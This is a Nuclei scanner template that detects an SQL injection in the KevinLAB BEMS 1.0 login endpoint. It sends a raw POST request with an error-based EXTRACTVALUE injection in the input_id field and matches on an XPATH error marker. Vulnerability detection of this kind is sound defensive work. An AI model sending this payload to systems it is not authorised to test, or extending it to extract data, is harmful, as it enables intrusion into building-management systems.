nuclei-templates/http/vulnerabilities/other/kevinlab-bems-sqli.yaml

43 lines
1.8 KiB
YAML

id: kevinlab-bems-sqli
info:
name: KevinLAB BEMS 1.0 - SQL Injection
author: gy741
severity: critical
description: KevinLAB BEMS 1.0 contains a SQL injection vulnerability. Input passed through input_id POST parameter in /http/index.php is not properly sanitized before being returned to the user or used in SQL queries. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
- https://www.exploit-db.com/exploits/50146
- https://packetstormsecurity.com/files/163572/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
metadata:
max-request: 1
tags: kevinlab,sqli,edb,packetstorm
http:
- raw:
- |
POST /http/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
requester=login&request=login&params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
matchers-condition: and
matchers:
- type: word
words:
- "XPATH syntax error"
- ": '\\ZSL1ZSL'"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100aea5527e8073e13141f822f79d51bf6b322180646ebb6e804d9836094811b9a3022100a23259cec291943f1de7254dcf5c2b67939a5ba70d72f7a40d6ce068a06d9c5b:922c64590222798bb761d5b6d8e72950